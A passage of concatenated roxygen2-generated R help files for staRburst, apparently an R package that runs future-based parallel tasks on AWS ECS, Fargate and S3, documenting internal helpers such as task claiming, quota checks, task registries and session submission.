atomic_claim_task(session_id, task_id, worker_id, region, bucket)
}
\arguments{
\item{session_id}{Session identifier}

\item{task_id}{Task identifier}

\item{worker_id}{Worker identifier claiming the task}

\item{region}{AWS region}

\item{bucket}{S3 bucket}
}
\value{
TRUE if claimed successfully, FALSE if already claimed
}
\description{
This is a helper that combines get + conditional update in one operation
}
\keyword{internal}

% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/quota.R
\name{check_fargate_quota}
\alias{check_fargate_quota}
\title{Check Fargate vCPU quota}
\usage{
check_fargate_quota(region)
}
\arguments{
\item{region}{AWS region}
}
\value{
List with quota information
}
\description{
Check Fargate vCPU quota
}
\keyword{internal}

% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/StarburstBackend-class.R
\name{nbrOfWorkers.StarburstBackend}
\alias{nbrOfWorkers.StarburstBackend}
\title{Number of workers for StarburstBackend}
\usage{
\method{nbrOfWorkers}{StarburstBackend}(evaluator)
}
\arguments{
\item{evaluator}{A StarburstBackend object}
}
\value{
Number of workers
}
\description{
Number of workers for StarburstBackend
}

% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/ec2-pool.R
\name{get_autoscaling_client}
\alias{get_autoscaling_client}
\title{Get Auto Scaling client}
\usage{
get_autoscaling_client(region)
}
\arguments{
\item{region}{AWS region}
}
\value{
Auto Scaling client
}
\description{
Get Auto Scaling client
}
\keyword{internal}

% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/task-registry.R
\name{task-registry}
\alias{task-registry}
\title{In-memory task ARN registry and ECS task listing for staRburst}
\description{
Tracks the ECS task ARNs submitted during a session and provides helpers to
list active clusters and stop running tasks.
}
\keyword{internal}

% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/task-registry.R
\name{list_task_arns}
\alias{list_task_arns}
\title{List all stored task ARNs}
\usage{
list_task_arns()
}
\description{
List all stored task ARNs
}
\keyword{internal}

% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/task-registry.R
\name{stop_running_tasks}
\alias{stop_running_tasks}
\title{Stop running tasks}
\usage{
stop_running_tasks(plan)
}
\description{
Stop running tasks
}
\keyword{internal}

% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/StarburstBackend-class.R
\name{listFutures.StarburstBackend}
\alias{listFutures.StarburstBackend}
\title{List futures for StarburstBackend}
\usage{
\method{listFutures}{StarburstBackend}(backend, ...)
}
\arguments{
\item{backend}{A StarburstBackend object}

\item{...}{Additional arguments}
}
\value{
List of futures (empty for this backend)
}
\description{
List futures for StarburstBackend
}

% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/network.R
\name{get_vpc_config}
\alias{get_vpc_config}
\title{Get VPC configuration for ECS tasks}
\usage{
get_vpc_config(region)
}
\description{
Get VPC configuration for ECS tasks
}
\keyword{internal}

% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/utils.R
\name{get_instance_specs}
\alias{get_instance_specs}
\title{Get instance specifications (vCPUs, memory)}
\usage{
get_instance_specs(instance_type)
}
\description{
Get instance specifications (vCPUs, memory)
}
\keyword{internal}

% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/errors.R
\name{permission_error}
\alias{permission_error}
\title{Permission denied error}
\usage{
permission_error(service, operation, resource = NULL, iam_role = NULL)
}
\description{
Permission denied error
}
\keyword{internal}

% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/session-backend.R
\name{session-backend}
\alias{session-backend}
\title{Session Backend Initialization}
\description{
Backend initialization for detached session mode
}
\keyword{internal}

% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/starburst-map.R
\name{starburst_cluster_map}
\alias{starburst_cluster_map}
\title{Execute Map on Starburst Cluster}
\usage{
starburst_cluster_map(cluster, .x, .f, .progress = TRUE)
}
\description{
Internal function to execute parallel map by creating StarburstFuture objects directly
}
\keyword{internal}

% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/session-api.R
\name{submit_to_session}
\alias{submit_to_session}
\title{Submit task to session}
\usage{
submit_to_session(session, expr, envir, substitute, globals, packages)
}
\description{
Submit task to session
}
\keyword{internal}
